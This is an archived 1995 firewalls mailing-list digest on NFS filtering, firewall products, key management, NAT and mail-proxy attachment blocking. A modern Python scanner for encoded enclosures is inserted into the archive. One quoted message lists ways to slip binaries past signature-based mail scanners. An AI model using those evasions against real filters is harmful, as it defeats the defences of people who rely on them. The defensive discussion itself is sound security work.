/jordan From firewalls-owner Tue Oct 3 12:30:00 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA20009 for firewalls-outgoing; Tue, 3 Oct 1995 12:12:42 -0700 Received: from dns.eng.auburn.edu (dns.eng.auburn.edu [131.204.10.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA19984 for ; Tue, 3 Oct 1995 12:12:33 -0700 Received: from netman.eng.auburn.edu (20663@netman.eng.auburn.edu [131.204.12.24]) by dns.eng.auburn.edu (8.6.12/8.6.4) with ESMTP id NAA26615; Tue, 3 Oct 1995 13:43:00 -0500 From: Doug Hughes Received: from localhost (doug@localhost) by netman.eng.auburn.edu (8.6.4/8.6.4) id NAA15266; Tue, 3 Oct 1995 13:42:56 -0500 Date: Tue, 3 Oct 1995 13:42:56 -0500 Subject: Re: NFS To: reg@dwf.com Cc: firewalls@greatcircle.com Message-Id: In-Reply-To: <199510030811.CAA03698@clemens.dwf.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >I am sure that this topic has been beaten to death, so if someone would >just point me at the discussion (or tell me that there is no solution) >I would be happy to take it from there. I remember reading a paper a >couple years ago describing why NFS could never be made secure, but for >the life of me I cant seem to find it now. > >The problem is SUN's NFS under SUNOS 4.1.3/4. I have a server with a half >dozen file systems that are exported read-only to all the other machines >in the domain. I would like to restrict their mounting to machines within >the domain while maintaining connectivity to the outside world. >SUN's software does not support this option, it only allows specifying >specific machine names, and the list of *all* machine names overflows >some internal limit in SUN's software. > >[ The machine uses DNS and not YP, it is rumored that possibly with YP one >can get by this limit, but I have no interest in adding YP to my list of >problems. 
>]
>
>So, the Questions
>
> (1) WITHOUT resorting to a firewall, is there any way to accomplish
>what I want to do?
>
> (2) If not, can it be done with a `simple' packet filter, or does it
>require a full blown firewall?
>
>
> Reg.Clemens
> clemens@dwf.com
>
>

Without necessarily resorting to a firewall, you can have your router to the outside world block:

  port 2049/udp - NFS
  port 111 udp/tcp - Sun RPC
  source routed packets
  outside packets with internal IP source addresses (IP spoofing)

This helps prevent a great deal of the most common attacks on NFS by preventing it getting outside your domain at the interface to the Internet. Also, installing the replacement tcp_wrappered version of portmap on your NFS servers from ftp.win.tue.nl is a good thing to do. This way you can limit what networks are able to send RPC requests to your server.

--
____________________________________________________________________________
Doug Hughes                                   Engineering Network Services
System/Net Admin                              Auburn University
doug@eng.auburn.edu
Apple T-shirt on Win95 - "Been there, done that"

From firewalls-owner Tue Oct 3 14:21:21 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA23435 for firewalls-outgoing; Tue, 3 Oct 1995 13:47:43 -0700 Received: from ns.via.net (ns.via.net [140.174.204.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA23422 for ; Tue, 3 Oct 1995 13:47:38 -0700 Received: (from joe@localhost) by ns.via.net (8.6.9/8.6.9) id NAA07589 for firewalls@GreatCircle.COM; Tue, 3 Oct 1995 13:46:08 -0700
Date: Tue, 3 Oct 1995 13:46:08 -0700
From: Joe McGuckin
Message-Id: <199510032046.NAA07589@ns.via.net>
To: firewalls@GreatCircle.COM
Subject: Need Windows FTP client source
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I need a windows FTP client that can do SNK authentication. I want to use it with the FWTK ftp-gw proxy.
The problem is that most of the gui based windows FTP clients don't have a command line or a logging window to view status messages, etc. Any suggestions? -joe From firewalls-owner Tue Oct 3 14:21:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA23387 for firewalls-outgoing; Tue, 3 Oct 1995 13:45:58 -0700 Received: from gateway.sctc.com (gateway.sctc.com [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA23371 for ; Tue, 3 Oct 1995 13:45:43 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id PAA17754; Tue, 3 Oct 1995 15:46:35 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 091390000; 3 Oct 95 16:44 CDT Received: from sctc.com by sccmailhost.sctc.com id 276510000; 3 Oct 95 16:43 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id PAA01419; Tue, 3 Oct 1995 15:43:28 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id PAA11874; Tue, 3 Oct 1995 15:43:26 -0500 Date: Tue, 3 Oct 1995 15:43:26 -0500 From: Rick Smith Message-Id: <199510032043.PAA11874@shade.sctc.com> To: firewalls@greatcircle.com Cc: glenn@border.com, smith@sctc.com Subject: Borderware (was: Information, We want information) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Glenn Mackintosh writes: >This is the second time I've heard rumors about insecurities in the >BorderWare software with nothing being brought out to substantiate them. I >guess this is just an unfortunate part of doing business - especially in the >security domain. I get a bit annoyed by this kind of thing since, >regardless of whether we refute such comments, after the discussion itself >is forgotten people will often remember that they heard something about a >problem with product X. 
The Internet giveth just as it taketh away -- people post unsubstantiated rumors as quickly as any of us can post denials. Now, to a technical question: >.... That said, Border doesn't use a stock BSD based OS anyway. We >have put a large amount of effort into "hardening" the kernel so that it is >a solid base upon which to build a secure firewall. ... [snip] .... >We spent a considerable amount of manpower stripping down the kernel and >leaving only what was really needed. We removed the mechanisms which can be >used to gain privilege or increase the levels of access to the system. So, the "hardening" of the Borderware kernel consists primarily of eliminating unnecessary portions of the BSD kernel, correct? This is not intended as a "leading question" from a competitor, just an attempt to clearly understand what Borderware has done. Rick. smith@sctc.com secure computing corporation From firewalls-owner Tue Oct 3 15:52:50 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA27309 for firewalls-outgoing; Tue, 3 Oct 1995 15:38:44 -0700 Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA27302 for ; Tue, 3 Oct 1995 15:38:40 -0700 Received: from pm3-17.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA29112; Tue, 3 Oct 95 17:35:21 -0400 Date: Tue, 3 Oct 95 17:35:21 -0400 Message-Id: <9510032135.AA29112@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com From: frankw@in.net (Frank Willoughby) Subject: Re: Encryption strength Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From padgett's excellent mail: >Further, key management is a perenniel problem. "How is that first secure >link established ?" is a chicken and the egg kind of problem. 
Today out-of- >channel is the most popular answer as demonstrated by Netscape but is either >a logistical nightmare or potential weakness. (It might be cheaper to buy >ViaSign than to break their certificates). Actually, the key management problem was solved by V-ONE a couple of years ago. (V-ONE is a firewall vendor). After the host & the firewall have mutually authenticated themselves to each other (to prevent node spoofing), the entire session is encrypted - with each session having a *different* (unique) encryption key. Individual files can also be encrypted using user-friendly "drag & drop" encryption - with the encrypted file having a *different* key than is used to encrypt the link between the user & the firewall. (The above applies to firewall-to-firewall communications also). BTW, the end-to-end encryption should put an end to the "terminal session hijacking". Eventually, other firewalls will incorporate similar technologies. Any firewall manufacturer that intends to stay in the field for the long run will have to incorporate extensive authentication & encryption mechanisms - just to stay in business. >For all of that, I believe that good encryption will be the element that >begins to make our jobs easier, both via creation of secure links between >Firewalls/Enterprises and through double wrapping at the application level. I couldn't agree more. 
> Warmly, > Padgett Best Regards, Frank From firewalls-owner Tue Oct 3 16:23:34 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA28611 for firewalls-outgoing; Tue, 3 Oct 1995 16:05:44 -0700 Received: from folio.com (smtpgate.folio.com [198.60.24.58]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA28604 for ; Tue, 3 Oct 1995 16:05:41 -0700 From: RTATE@folio.com Received: from FOLIO_PRIMARY_DOMAIN-Message_Server by folio.com with WordPerfect_Office; Tue, 03 Oct 1995 17:07:44 -0600 Message-Id: X-Mailer: WordPerfect Office 4.0 Date: Tue, 03 Oct 1995 17:05:45 -0600 To: firewalls@greatcircle.com Subject: Borderware vs. Firewall-1 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ** Low Priority ** I am in the process of purchasing a firewall package for the company I work for. I have narrowed my choices down to Borderware and Firewall-1. Which is a better choice, and why? Is there another package out there that is better I may not have seen? Thanks in advance for responses!! Please reply to: rtate@folio.com Robert Tate Sr. Network Technician Folio Corporation Thanks robert From firewalls-owner Tue Oct 3 18:23:53 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA02534 for firewalls-outgoing; Tue, 3 Oct 1995 18:07:13 -0700 Received: from vision.postech.ac.kr (vision.postech.ac.kr [141.223.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA02527 for ; Tue, 3 Oct 1995 18:06:57 -0700 Received: (from rhee@localhost) by vision.postech.ac.kr (8.6.12H1/8.6.12) id KAA17605; Wed, 4 Oct 1995 10:01:04 +0900 From: Snow-Flower Message-Id: <199510040101.KAA17605@vision.postech.ac.kr> Subject: Exact format for subscribing the info security list. 
To: Firewalls@GreatCircle.COM Date: Wed, 4 Oct 1995 10:01:03 +0900 (JST) Cc: rhee@vision.postech.ac.kr (Flower) X-Mailer: ELM [version 2.4 PL21-h4] MIME-Version: 1.0 Content-Type: text/plain; charset=iso-2022-kr Content-Transfer-Encoding: 7bit Content-Length: 1029 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, sir. I like to know what is the exact format for subscribing the info security list. I've tried to send subscription message to LISTSERV@ETSUADMN.ETSU.EDU serveral times I failed. Message body was ......... subscribe Young Rhee Please let me know . Thanks in advance. rhee@vision.postech.ac.kr o----o----o-----o----o----o----o----o----o----o----o----o----o----o----o----o Young Rhee (Snow-Flower) Computer Center * Pohang Institute of Science and Technology | P.O.Box 125 | Pohang,Kyungbuk 790-600 x E-mail : rhee@vision.postech.ac.kr xxx Phone : +82-0562-279-2529 xxxxxxx Fax : +82-0562-279-2599 xxxxxxxxxxxxxxx o----o----o----o----o----o----o----o----o----o----o-----o-----o----o----o----o From firewalls-owner Tue Oct 3 19:22:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA03616 for firewalls-outgoing; Tue, 3 Oct 1995 19:12:29 -0700 Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA03609 for ; Tue, 3 Oct 1995 19:12:25 -0700 Date: Tue, 3 Oct 1995 22:10:58 -0400 (EDT) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <951003221058.21058735@hobbes.orl.mmc.com> Subject: re: Encryption strength Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Frank rites: >Actually, the key management problem was solved by V-ONE a couple of years >ago. (V-ONE is a firewall vendor). >After the host & the firewall have mutually authenticated themselves to each >other (to prevent node spoofing), the entire session is encrypted - with each >session having a *different* (unique) encryption key. 
Sounds wonderful but pray tell *how* do they authenticate each other ? Out- of-channel ? Nice thing about the Netscape reversal of the traditional mechanism is that a secure channel is created *before* any trust is exchanged. Given that, traditional means of authentication are possible without worry of sniffing. Spoofing yes, but not sniffing and us aunchient mainframers know how to handle spoofing 8*). Warmly, Padgett ps had an interesting conversation with the NSA today in which I was told that it is OK to explain why the right side of a KW-26 card case has all them little dents - of course you will have to be shot afterwards... From firewalls-owner Tue Oct 3 19:52:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA03859 for firewalls-outgoing; Tue, 3 Oct 1995 19:33:01 -0700 Received: from aurora.cdev.com (aurorax.cdev.com [160.207.114.200]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA03852 for ; Tue, 3 Oct 1995 19:32:57 -0700 Message-Id: <199510040232.TAA03852@miles.greatcircle.com> Received: from cdicisco8.cdev.com by aurora.cdev.com id SMTP-0013071f24d019269; Tue, 3 Oct 95 21:32:48 -0500 X-Sender: djs3wn39@aurora.cdev.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 03 Oct 1995 18:19:14 -0700 To: firewalls-digest@GreatCircle.COM From: Donald.J.Smith@.cdev.com (Donald J Smith) Subject: re re nfs Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: David Brownlee >Date: Tue, 3 Oct 1995 10:55:04 +0100 (BST) >Subject: Re: NFS > >On Tue, 3 Oct 1995, Reg Clemens wrote: > >> [...] >> >> The problem is SUN's NFS under SUNOS 4.1.3/4. I have a server with a half >> dozen file systems that are exported read-only to all the other machines >> in the domain. I would like to restrict their mounting to machines within >> the domain while maintaining connectivity to the outside world. 
>> SUN's software does not support this option, it only allows specifying
>> specific machine names, and the list of *all* machine names overflows
>> some internal limit in SUN's software.
>>
>> [...]
>
> Replace the innetgr.c in libc.so with a non broken version.
> (I have a non broken version I can mail on request)
> I did that here & happily exported to ~200 machines (with FQDN) from
> SunOS 4.1.3 & 4.1.4. More recently I've replaced SunOS with NetBSD
> which gets it right without any help (And has a _much_ better
> /etc/exports syntax - I can export to 138.40.X.X easily, and map all
> uids (not just root) to a given uid & other nice things too).
>
>
> David/abs
>
> D.K.Brownlee@city.ac.uk (MIME) +44 171 477 8186 {post,host}master (abs)
>Network Analyst, UCS, City University, Northampton Square, London EC1V 0HB.
> <<< Monochrome - Largest UK Internet BBS - telnet mono.org >>>
>>=- Microsoft: Abort and Retry Cancel -or- NetBSD: http://www.netbsd.org -=<
>
>
>-----

You can also chain netgroups, but without that firewall (that as a minimum prevents spoofing internal IP addresses) it is all for naught. Someone comes in as a legal address and your hole (yes that is spelled correctly) is shot.
Donald J Smith
Network Security Engineer @Computing Devices International
"@begin design in the security and ease_of_use != A*(1/Data_Security)"
(my opinions are mine and so are the spelling errors ;-)

From firewalls-owner Tue Oct 3 20:00:00 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA03893 for firewalls-outgoing; Tue, 3 Oct 1995 19:34:41 -0700 Received: from gw2.att.com (gw2.att.com [192.20.239.134]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA03886 for ; Tue, 3 Oct 1995 19:34:38 -0700 Received: from vodka.sse.att.com by ig1.att.att.com id AA13463; Tue, 3 Oct 95 08:52:59 EDT
Message-Id: <9510031252.AA13463@ig1.att.att.com>
From: mdr@vodka.sse.att.com
Subject: Re: Mail Proxy
To: long-morrow@CS.YALE.EDU
Date: Tue, 3 Oct 1995 08:54:35 -0400 (EDT)
Cc: firewalls@greatcircle.com
In-Reply-To: <199510021459.KAA26661@SPARKY.CF.CS.YALE.EDU> from "long-morrow@CS.YALE.EDU" at Oct 2, 95 10:59:08 am
X-Mailer: ELM [version 2.4 PL23-upenn2.7]
Mime-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

We've gone around this circle at least once before, coming up to two conclusions.

1) it is *impossible* to prevent a determined individual from transferring executables via email. (But you can slow them down)

2) The vast majority of such transfers *can* be prevented by an automated program scanning for the most common forms of encoding.

Also, it is possible to virus scan the binaries that have been detected. However, general consensus is that such scanning is ineffective because it only covers one channel of binaries to the PC (floppy disks are another). Virus scanning must be done at the PC.

However, I must admit that I'd be interested in a Word document macro virus scanner :) These "executable content" vira are an interesting breed.

Mark Riggins
Secure Systems Engineering
AT&T Bell Labs

> > Chris Tyler wrote:
> >
> >Slava Kritov writes:
> >
> >> Any uuencode ?
> >> Sorry, as a sysadm of 500+ orgs can say, that people sometimes exchange
> >> word docs in uuencode, and ( for Mac's ) you can't even say its word doc
> >> based on name ...
> >
> >Right... so? The purpose was to deny all attachments, whether word DOCs or executables. So
> >you look for the uuencode signature string and deny.
>
> But by only looking for the 'signature's of known binary encoding formats
> you then open yourself up for people to create their own encoding formats
> to get around your scan for, and restriction on encoded message enclosures.
>
> 3 possibilities for getting around a scan for known encoding signatures :
>
> 1. rot13 a uuencoded file before e-mailing it. Describe in the message
> how to unrot13 the message before uudecoding it.
>
> 2. Use an (admittedly) inefficient format for encoding binary, such as:
>
> RAVE AFRO STUB DAM HONE HAY
> CLAD WILL JOIN PET LONG WEED
> ...
>
> The recipient will need a decoder of course.
>
> 3. PGP encrypt the entire message before transmitting. How will the
> mail scanner know what is inside the message? Are you going to
> reject all encrypted messages? I think that encrypted messages
> will increasingly become the norm on the Internet as PC based
> mail programs incorporate automatic easy-to-use PGP encryption.
> > > - Morrow > > From firewalls-owner Tue Oct 3 21:00:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA05431 for firewalls-outgoing; Tue, 3 Oct 1995 20:52:03 -0700 Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id UAA05424 for ; Tue, 3 Oct 1995 20:52:00 -0700 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id WAA09928 for GreatCircle.COM!firewalls; Tue, 3 Oct 1995 22:33:46 -0500 Received: by ris1.nmti.com (smail2.5) id AA18501; 3 Oct 95 19:37:40 CDT (Tue) Received: by sonic.nmti.com; id AA11758; Tue, 3 Oct 1995 20:04:29 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9510040104.AA11758@sonic.nmti.com.nmti.com> Subject: Re: FW to FW FTP w/ no port > 1023 To: sgcccdc@citec.qld.gov.au (Colin Campbell) Date: Tue, 3 Oct 1995 20:04:28 -0500 (CDT) Cc: wbunting@ch.inri.com, firewalls@GreatCircle.COM In-Reply-To: <9510022336.AA14998@citecub.citec.qld.gov.au> from "Colin Campbell" at Oct 3, 95 09:36:16 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 341 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > 3. Do not use FTP and write a TCP application that uses only a single TCP > > port for data and control. Issues: Time + $$ no compatibility. Benefit: > > solves the problem. FSP and HTTP are both candidates for this application. And they've already been written. NNTP would work as well, and can be proxied with a simple plug gateway. 
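The mail-proxy exchange two messages up (Mark Riggins's two conclusions, and the three evasions in the quoted list from Morrow) describes a signature scanner without showing one. The block below is an added worked example, not code from the firewalls list or from any product named in this digest. It flags the common encodings by their signature lines (uuencode "begin", BinHex, MIME base64 parts and attachment dispositions), undoes the rot13 trick per line so that evasion 1 no longer works against it, and reports a PGP-encrypted body as opaque, which is the case the thread says a scanner cannot decide on its own. Evasion 2, a private word-list encoding, is exactly what a signature scanner has no signature for, and the example makes no claim to catch it. The sample messages and the labels in SIGNATURES are constructed for the example.

```python
"""Signature scan of an e-mail message for encoded binary enclosures.
Added example for the Mail Proxy thread; constructed sample messages."""
import codecs
import re

# (label, regex tried against each line of the message)
SIGNATURES = [
    ("uuencode", re.compile(r"^begin [0-7]{3,4} \S")),
    ("binhex", re.compile(r"^\(This file must be converted with BinHex")),
    ("mime-base64", re.compile(r"^content-transfer-encoding:\s*base64\b", re.I)),
    ("mime-attachment", re.compile(r"^content-disposition:\s*attachment\b", re.I)),
    ("pgp-encrypted", re.compile(r"^-----BEGIN PGP MESSAGE-----")),
]

# Trivial per-line transforms the scanner can undo (evasion 1 in the thread)
TRANSFORMS = [("rot13", lambda s: codecs.decode(s, "rot13"))]


def scan_message(text):
    """Return [(line_number, label)] for every signature hit in the message."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.rstrip("\r")
        for label, pattern in SIGNATURES:
            if pattern.match(line):
                findings.append((lineno, label))
        # Same signatures again after undoing each known transform of the line
        for tname, undo in TRANSFORMS:
            decoded = undo(line)
            for label, pattern in SIGNATURES:
                if label != "pgp-encrypted" and pattern.match(decoded):
                    findings.append((lineno, "%s-%s" % (tname, label)))
    return findings


def verdict(findings):
    """'reject' for any encoded enclosure, 'opaque' when the only hit is an
    encrypted body (policy, not the scanner, must decide that case), else
    'deliver'."""
    labels = {label for _, label in findings}
    if labels - {"pgp-encrypted"}:
        return "reject"
    if "pgp-encrypted" in labels:
        return "opaque"
    return "deliver"


# Constructed sample messages (not real mail)
PLAIN = "From: alice@example.com\nSubject: lunch\n\nNoon works for me.\n"

UUENCODED = (
    "From: alice@example.com\nSubject: that file\n\n"
    "begin 644 setup.exe\n"
    "M35J0``,````$````__P``+@`````````0```````````````````````````\n"
    "`\nend\n"
)

# The same enclosure with the uuencode lines rot13'd, as in evasion 1
ROT13_UUENCODED = (
    "From: alice@example.com\nSubject: that file\n\n"
    "ortva 644 frghc.rkr\n"
    "Z35W0``,````$````__C``+@`````````0```````````````````````````\n"
    "`\nraq\n"
)

MIME_B64 = (
    "From: alice@example.com\n"
    'Content-Type: multipart/mixed; boundary="X"\n\n'
    "--X\n"
    'Content-Type: application/octet-stream; name="tool.exe"\n'
    "Content-Transfer-Encoding: base64\n\n"
    "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n"
    "--X--\n"
)

PGP = (
    "From: alice@example.com\nSubject: hush\n\n"
    "-----BEGIN PGP MESSAGE-----\nVersion: 2.6.2\n\n"
    "hIwDo3w6sVqcbTkBA9z1\n=abcd\n"
    "-----END PGP MESSAGE-----\n"
)

if __name__ == "__main__":
    for name, msg in [("plain", PLAIN), ("uuencoded", UUENCODED),
                      ("rot13", ROT13_UUENCODED), ("mime", MIME_B64), ("pgp", PGP)]:
        hits = scan_message(msg)
        print("%-10s %-8s %s" % (name, verdict(hits), hits))
```

The scanner works line by line and anchors every signature at the start of the line, the same place a uudecode or MIME parser would look for it, so a signature buried in prose does not fire. Adding a transform to TRANSFORMS is the only change needed when a new trivial obfuscation shows up; a real private encoding (evasion 2) is outside what this approach can do, which is Mark's first conclusion.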
From firewalls-owner Tue Oct 3 21:22:33 1995
From: frankw@in.net (Frank Willoughby)
To: firewalls@GreatCircle.com
Date: Tue, 3 Oct 95 23:06:00 -0400
Subject: re: Encryption strength
Message-Id: <9510040306.AA12903@su1.in.net>

From the desk of Padgett:

>Frank rites:
>>Actually, the key management problem was solved by V-ONE a couple of years
>>ago. (V-ONE is a firewall vendor).
>
>>After the host & the firewall have mutually authenticated themselves to each
>>other (to prevent node spoofing), the entire session is encrypted - with each
>>session having a *different* (unique) encryption key.
>
>Sounds wonderful but pray tell *how* do they authenticate each other ? Out-
>of-channel ? Nice thing about the Netscape reversal of the traditional
>mechanism is that a secure channel is created *before* any trust is exchanged.
>Given that, traditional means of authentication are possible without worry
>of sniffing. Spoofing yes, but not sniffing and us aunchient mainframers know
>how to handle spoofing 8*).

Would it suffice to say that it was good enough for NSA - and that it is the
*only* Internet firewall used in a NSA-approved configuration? In a public
forum, this is probably all I can say.
> Warmly,
> Padgett
>
>ps had an interesting conversation with the NSA today in which I was told that
> it is OK to explain why the right side of a KW-26 card case has all them
> little dents - of course you will have to be shot afterwards...

You might also ask your contacts at the Puzzle Palace about how V-ONE does
mutual authentication.

Best Regards,

Frank

From firewalls-owner Wed Oct 4 00:32:09 1995
From: Paul A Vixie
To: firewalls@greatcircle.com
Date: Wed, 04 Oct 1995 00:26:39 -0700
Subject: re: network address translation
Message-Id: <9510040726.AA26556@wisdom.home.vix.com>

I was forwarded this by a friend and asked to respond to it publicly. I am
not on the firewalls mailing list, so CC me on your reply if any.

>Frank Senter, Senior Information Specialist
>Missouri Highway and Transportation Department
>P.O. Box 270, Jefferson City MO 65102

...wrote:

>I've heard there are a couple of commercial network address translators
>available for those of us who were foolish enough to build extensive
>enterprise networks on non-NIC assigned addresses. Does anyone have any
>real-world experience with such a product?

I have heard that IBM sells a commercial product that can do this. I don't
have any experience with it, and in fact I have never heard from a non-IBM
user of it so I have no idea how well it works.
At Usenix LISA a few weeks ago in Monterey, CA, the first booth inside the
front door belonged to a company that sold NAT boxes. They appeared to be
based on some BSD flavour, and they wanted to sell hardware rather than just
a software solution. Now if I could only remember their company name. Ah,
here it is in the vendor directory included with my conference materials:
Border Network Technologies; Borderware Firewall Server; .

Last but not least, I took a stab at this a while ago but I did all the magic
in the application gateway process address space; this means the proxy
gateway is something akin to SOCKS but with a more robust protocol, listeners,
round robin'ed incoming/outgoing connections for performance and redundancy,
and most important, little or no source code modifications (I replace system
calls with library calls that have wider semantics.) I'll be giving a talk
about this at the Network Security '95 ("SANS") conference; . My software
will be available and freely redistributable shortly after I present my paper.

>Is it possible to kludge such a product together on a commercial firewall?

That depends. If you chose a network that RFC 1597 set aside for private
networks, or you know that you will never want to exchange packets with
whoever holds the real delegation for the network you are using, then yes,
you can kludge this together out of standard components. If on the other hand
you are dealing with an "ambiguous prefix" where your border will have to
disambiguate two networks (one inside, one outside) with the same prefix, then
you need something stronger or you need a lot of intermediate moat nets.

>And lastly, is the cost/effort of implementing such a product <= effort of
>renumbering 2k hosts?

I renumbered 2K hosts in four days with only one person helping me. But we
were in an engineering environment and the production component was pretty
small; also, we had root access on virtually all of the 2K hosts.
If your hosts are all over the country and owned/run by different
administrations, or if your production machines aren't easily corralled, or
if your users are not engineers (and thus, not understanding of _your_
problems), then I suspect that the time taken to plan and implement a "safe"
renumbering of your 2K hosts is as large or larger than the time it will take
to build or install a disambiguating firewall.

If you do renumber, I recommend that you renumber into an RFC 1597 prefix and
use some kind of NAT solution or moat-based firewall with application
gateways. This will make it possible for you to multi-home your net -- all
you will have to do is get additional outside connections to the NAT or
firewall, since each of your providers will only see the one little segment
of the network that they want you to live on. The fact that you've got 2K
hosts needn't trouble them -- in fact they need not even be aware of it. This
will give you the added flexibility of being able to dump your provider and
move to their competitor without fighting over the ownership of your prefix,
or paying the renumbering cost every time you switch.

I guess you can tell that I think RFC 1597 is a good thing.

Hope this helps.

Paul Vixie
La Honda, CA
"Illegitimi non carborundum."
pacbell!vixie!paul
(don't let the bastards grind you down)

From firewalls-owner Wed Oct 4 02:00:02 1995
From: Luc Vanderschelde
To: RTATE@folio.com
Cc: firewalls@greatcircle.com
Date: Wed, 4 Oct 95 09:42:42 PDT
Subject: RE: Borderware vs. Firewall-1

Robert,

deciding on what package is the best can only be done in function of the
security policy you want to apply. So, I can not tell you if there is a
better package somewhere.

If you like a firewall comparison of the products Firewall_1, Raptor Eagle,
Black Hole, DEC SEAL, Janus, TIS Gauntlet, then contact info@milkyway.com

Note that Milkyway Networks (Ontario, Canada) is the developer of Black Hole,
so the comparison might be somewhat "coloured". Their web server is at
http://www.milkyway.com

Have fun,
Luc
-----------------------------------------------------
Name: Luc Vanderschelde
Company: AMDAHL Belgium NV/SA
Department: Business Solutions Group
Function: Consultant
E-mail: lzv10@juts.ccc.amdahl.com (Luc Vanderschelde)
Date: 06/15/95
Time: 17:32:08
-----------------------------------------------------
---------------Included Message---------------
To: firewalls@greatcircle.com
Subject: Borderware vs. Firewall-1
** Low Priority **

I am in the process of purchasing a firewall package for the company I work
for. I have narrowed my choices down to Borderware and Firewall-1. Which is a
better choice, and why? Is there another package out there that is better I
may not have seen?

Thanks in advance for responses!!

Please reply to: rtate@folio.com

Robert Tate
Sr. Network Technician
Folio Corporation

Thanks
robert

From firewalls-owner Wed Oct 4 05:24:58 1995
From: toon@cem-bb.e-mail.com
To: firewalls@greatcircle.com
Date: Wed, 04 Oct 1995 08:12:27 EDT
Message-Id: <199510041210.FAA12516@miles.greatcircle.com>

I'm always happy when I find overview lists of products or even comparisons
between products. So I asked RPower@MFI.COM already for the '1995 Internet
security survey' and I hope I will get it soon.

So, I liked the response from Luc Vanderschelde (AMDAHL) to Robert Tate
including a list of products and a reference to a comparison. However the
IBM product NetSP Gateway was not in the list. Maybe he just forgot to
mention it. (Hoi, Luc)

The question now is. I've heard a lot of good things about NetSP Gateway at
different places. Are there some clients of this product on this list, that
I can contact to ask them about their experiences?
Toon Mordijck
CEM-Groep Boerenbond, Belgium
toon@cem-bb.e-mail.com

From firewalls-owner Wed Oct 4 06:23:18 1995
From: David Miller
To: Frank Willoughby
Cc: firewalls@GreatCircle.com
Date: Wed, 4 Oct 1995 09:07:56 -0400 (EDT)
Subject: Re: Encryption strength
In-Reply-To: <9510032135.AA29112@su1.in.net>

On Tue, 3 Oct 1995, Frank Willoughby wrote:

> From padgett's excellent mail:
>
> >Further, key management is a perennial problem. "How is that first secure
> >link established ?" is a chicken and the egg kind of problem. Today out-of-
> >channel is the most popular answer as demonstrated by Netscape but is either
> >a logistical nightmare or potential weakness. (It might be cheaper to buy
> >ViaSign than to break their certificates).
>
> Actually, the key management problem was solved by V-ONE a couple of years
> ago. (V-ONE is a firewall vendor).
>
> After the host & the firewall have mutually authenticated themselves to each
> other (to prevent node spoofing), the entire session is encrypted - with each
> session having a *different* (unique) encryption key.

But this is the crux of the chicken-and-egg problem. How do they mutually
authenticate each other? If they do it with a shared secret or through prior
arrangement a secure channel had to previously exist. If there is no third
party/shared secret then it's subject to a man-in-the-middle attack.
Now if *that's* been solved, I'd be *delighted* to hear about it!

--- David
----------------------------------------------------------------------------
It's *amazing* what one can accomplish when one doesn't know what one can't do!

From firewalls-owner Wed Oct 4 06:52:36 1995
From: "A. Padgett Peterson, P.E. Information Security"
To: firewalls@greatcircle.com
Date: Wed, 4 Oct 1995 9:29:47 -0400 (EDT)
Subject: Re: Mail proxy
Message-Id: <951004092947.2105ed38@hobbes.orl.mmc.com>

